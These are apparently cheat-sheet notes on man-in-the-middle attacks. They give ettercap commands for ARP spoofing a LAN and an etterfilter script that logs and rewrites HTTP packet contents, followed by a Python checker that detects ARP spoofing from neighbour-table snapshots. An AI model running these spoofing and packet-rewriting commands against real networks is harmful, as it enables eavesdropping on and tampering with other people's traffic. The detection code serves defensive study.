killchain-compendium/post_exploitation/docs/mitm.md

2021-10-23 02:03:06 +02:00
# Man In the Middle
* [Ettercap](https://www.ettercap-project.org/)
* [Bettercap](https://www.bettercap.org/)
* ARP spoofing via ettercap to read traffic. Press `q` to quit and restore the pre-MITM ARP caches
```sh
ettercap -T -i <interface> -M arp
```
* Etterfilter can filter and restructure packets
```sh
man etterfilter
```
```
# Match TCP traffic to port 80 whose payload contains "filename.html"
if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html")) {
    # Log the matching payload, then rewrite the string in the packet
    log(DATA.data, "/tmp/ettercap.log");
    replace("filename.html", "otherfilename.html");
    msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
}
```
* Escape double quotes inside the payload string
* Compile via
```sh
# filter.filter is the filter source (file name assumed); filter.ef is the compiled output
etterfilter filter.filter -o filter.ef
```
* Run the filter via
```sh
ettercap -T -i <interface> -M arp -F filter.ef
```
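
A defensive counterpart to the ARP spoofing step above, added here as an example (not part of the original notes): it compares two snapshots of `ip neigh show` output and flags an IPv4 address whose MAC changed, or one MAC answering for several addresses. The snapshots, addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# One IPv4 line of `ip neigh show`; ARP is IPv4-only, so IPv6 entries are ignored.
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+(?P<dev>\S+)\s+"
    r"lladdr\s+(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})\b"
)

# Constructed sample snapshots (addresses are made up for this example).
BEFORE = """\
192.168.1.1 dev eth0 lladdr 52:54:00:aa:00:01 REACHABLE
192.168.1.50 dev eth0 lladdr 52:54:00:aa:00:50 STALE
192.168.1.77 dev eth0 FAILED
fe80::1 dev eth0 lladdr 52:54:00:aa:00:01 router STALE
"""
AFTER = """\
192.168.1.1 dev eth0 lladdr 52:54:00:aa:00:50 REACHABLE
192.168.1.50 dev eth0 lladdr 52:54:00:aa:00:50 STALE
fe80::1 dev eth0 lladdr 52:54:00:aa:00:01 router STALE
"""


def parse_neigh(text):
    """Return {(dev, ip): mac} for IPv4 entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[(m["dev"], m["ip"])] = m["mac"].lower()
    return table


def arp_anomalies(before, after):
    """Compare two snapshots and return a sorted list of finding tuples."""
    old, new = parse_neigh(before), parse_neigh(after)
    findings = []
    # 1. An IP whose MAC differs from the earlier snapshot.
    for key, mac in new.items():
        if key in old and old[key] != mac:
            findings.append(("changed", key[1], old[key], mac))
    # 2. One MAC claiming several IPs on the same interface (can be legitimate aliasing).
    owners = defaultdict(set)
    for (dev, ip), mac in new.items():
        owners[(dev, mac)].add(ip)
    for (dev, mac), ips in owners.items():
        if len(ips) > 1:
            findings.append(("shared", mac, ", ".join(sorted(ips))))
    return sorted(findings)
```

Because ettercap restores the ARP caches on exit, a single check after the fact shows nothing; snapshots need to be taken periodically and compared against a known-good baseline such as the gateway's real MAC.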